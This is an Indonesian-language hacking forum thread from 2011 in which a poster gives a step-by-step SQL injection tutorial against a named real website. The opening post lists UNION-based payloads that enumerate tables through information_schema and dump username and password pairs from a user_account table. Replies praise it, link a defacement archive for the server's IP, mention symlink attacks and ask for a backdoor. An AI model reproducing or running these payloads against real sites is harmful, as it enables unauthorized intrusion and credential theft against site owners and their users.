Home General Computer Multimedia Business Lounge
|
Tutor SQL Injection For Newbie (Share Di Mari)
|
|
12-29-2011, 06:27 PM
|
|||
|
|||
|
SQL Injection For Newbie (Share Di Mari)
selamat sore teman-teman DC
ane mau ngelanjutin thread ane yng tadi subuh udah di close sama admin DC karena menyimpang dari rule DC ![]() sebelumnya ane minta maaf ya tentang thread ane yang itu ![]() okeh di mulai aja dah ane bikin thread kali ini buat para calon-calon hacker muda yang baru tau dan pengen mendalami tentang SQl injection ( gaya banget ya ane) , untuk para dewa (dewa19 kaleee ) ngga usah liat juga gpp, tapi alangkah baiknya bisa menasehati dan menyarankan untuk daun muda (kaya ane).sebenernya udah ada thread yang kaya begini, tapi ane mencoba merefresh aja lagi, semoga diijin kan sama om dewa-dewa (amiinnn) RULE: 1. Harus pake gambar untuk memberikan tutorial(biar para daun muda bisa belajar ) kalo bertanya bebas 2. Harus jelas dalam bertanya dan memberikan tutorial 3. Kalo post itu memang bermanfaat buat kalian yg pembaca alangkah baiknya di berikan cendol kalo beitu langsung aja deh, sekarang ane duluan Code: target : www.canseburesort.co.iddari alamt website ini terdapat celah Sqli, Code: www.canseburesort.co.id/?id_page=6&id_berita=15Code: www.canseburesort.co.id/?id_page=6&id_berita=15'di lanjut kalo gitu, untuk mengecek berapa jumpaj kolom kita menggunakan order by Code: id_berita=-15 order by 1--berikut gambar ketika menggunakan Code: id_berita=-15 order by 1-- )lanjut... setelah kita dapet jumlah kolom kita menggunakan perintah union untuk mendapat kan the magic number Code: id_berita=-15 union all select 1,2,3,4,5,6,7,8--dari angka itu kita bakalan dapet informasi sepert: versi : version() user : user() database : database() nama tabel : table_name nama kolom : column_name dll okeh di lanjut ya, sekarang kita pengen tau versi berapa dan apa nama databasenya Code: id_berita=-15 union all select 1,2,3,4,group_concat(version(),database()),6,7,8--Code: id_berita=-15 union all select 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=database()--Quote:additional_menu, ini dia yg kita cari-cari dari nama-nama tabel di atas ane pilih yang user_account karena kelihatannya menyimpan akses buat login (mudah-mudahan bisa )sebelum kita mendapatkan nama kolom kita harus mengganti nama tabel user_account dalam bentuk hex : Code: user_account = 0x757365725f6163636f756e74Code: id_berita=-15 union all select 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name= 0x757365725f6163636f756e74-- dapet juga tuh, sekarang kita liat password sama usernamenyaCode: id_berita=-15 union all select 1,2,3,4,group_concat(username,0x3a,password),6,7,8 from user_account--![]() kalo beruntung kita bisa decrypt itu username sama password tapi kalo ngga bisa ya pasrah ![]() demikian penjelasan dari ane, terimakasih atas perhatiannya dan juga ane minta maaf kalo banyak kekurangan dalam memberikan tutor dan dalam hal penulisannya... semoga membantu para daun muda DC (amin)di tunggu hasil kreasi kalian semuanya.. jangan lupa di cendolin yak... ----Terima Kasih DC---- |
|||
Reputed by : ketek(+2) , lionel(+1) , oootrxooo(+1) |
|
12-29-2011, 06:34 PM
(This post was last modified: 12-29-2011 06:35 PM by ohara_inamiji.)
|
|||
|
|||
|
RE: SQL Injection For Newbie (Share Di Mari)
sedikit saran dari ane...
![]() kalo mau nyoba sqli pastiin dulu ada halaman admin nya... karena walau di inject gak ketemu halaman admin nya bisa bikin frustasi...
|
|||
|
12-29-2011, 06:38 PM
|
|||
|
|||
|
RE: SQL Injection For Newbie (Share Di Mari)
nice share bang
![]() tapi kalau ane pribadi pentest ke website luar aja bang sebagai contoh
|
|||
|
12-29-2011, 06:39 PM
(This post was last modified: 12-29-2011 06:41 PM by cangcimen.)
|
|||
|
|||
RE: SQL Injection For Newbie (Share Di Mari)
(12-29-2011 06:34 PM)ohara_inamiji Wrote: sedikit saran dari ane... namanya juga ngga sengaja lewat, terus nemu deh, ![]() tengkyu sarannya... ![]() (12-29-2011 06:38 PM)rusuh Wrote: nice share bang iye om,, ane ngga sengaja juga sih ane kan bukan heker
|
|||
|
12-29-2011, 07:08 PM
|
|||
|
|||
|
RE: SQL Injection For Newbie (Share Di Mari)
ngono iku lo yo opo seh carane ?
|
|||
|
12-29-2011, 07:40 PM
(This post was last modified: 12-29-2011 07:44 PM by rusuh.)
|
|||
|
|||
|
RE: SQL Injection For Newbie (Share Di Mari)
http://www.zone-h.org/archive/ip=116.90.165.138
habis ![]() pantang dapet sela langsung kena symlink ![]() Quote:OS : Linux indo7.liveserver.info 2.6.18-238.el5 #1 SMP Thu Jan 13 15:51:15 EST 2011 x86_64
|
|||
|
12-29-2011, 08:16 PM
|
|||
|
|||
|
RE: SQL Injection For Newbie (Share Di Mari)
mantep omz.. ane ngati ampe situ caraya
|
|||
|
12-29-2011, 08:20 PM
|
|||
|
|||
|
RE: SQL Injection For Newbie (Share Di Mari)
keren
ane minta backdoor nya ajah lah
|
|||
|
12-29-2011, 09:32 PM
|
|||
|
|||
RE: SQL Injection For Newbie (Share Di Mari)
(12-29-2011 07:40 PM)rusuh Wrote: http://www.zone-h.org/archive/ip=116.90.165.138 mantap om..
|
|||
|
12-29-2011, 10:00 PM
|
|||
|
|||
RE: SQL Injection For Newbie (Share Di Mari)
(12-29-2011 06:27 PM)cangcimen Wrote: selamat sore teman-teman DC om bisa di jelasin nggak pada bagian ini Quote:sebelum kita mendapatkan nama kolom kita harus mengganti nama tabel user_account dalam bentuk hex : kenapa harus di ubah or di hex terlebih dahulu ? kenapa gk lgsg aja atau klw pun harus di encrpyt kenapa harus dalam bentuk hexa kenapa nggak md5 base64 r00t13 or sha-1 or yg lain ?
|
|||
|
« Next Oldest | Next Newest »
|
| Topic Tools | ||||||
| ||||||
| Users Browsing |
| 1 Guest(s) |



) ngga usah liat juga gpp, tapi alangkah baiknya bisa menasehati dan menyarankan untuk daun muda (kaya ane).![[Image: 6schhh.jpg]](http://oi41.tinypic.com/6schhh.jpg)
![[Image: 2zgddom.jpg]](http://oi40.tinypic.com/2zgddom.jpg)
![[Image: 35lrx35.jpg]](http://oi44.tinypic.com/35lrx35.jpg)
![[Image: 35krj8w.jpg]](http://oi42.tinypic.com/35krj8w.jpg)
![[Image: 1zbxpo8.jpg]](http://oi42.tinypic.com/1zbxpo8.jpg)
![[Image: t8rvoy.jpg]](http://oi43.tinypic.com/t8rvoy.jpg)
![[Image: 16hlrog.jpg]](http://oi40.tinypic.com/16hlrog.jpg)
![[Image: 1zwc3ee.jpg]](http://oi44.tinypic.com/1zwc3ee.jpg)
dapet juga tuh, sekarang kita liat password sama usernamenya![[Image: r0doah.jpg]](http://oi43.tinypic.com/r0doah.jpg)









ane minta backdoor nya ajah lah






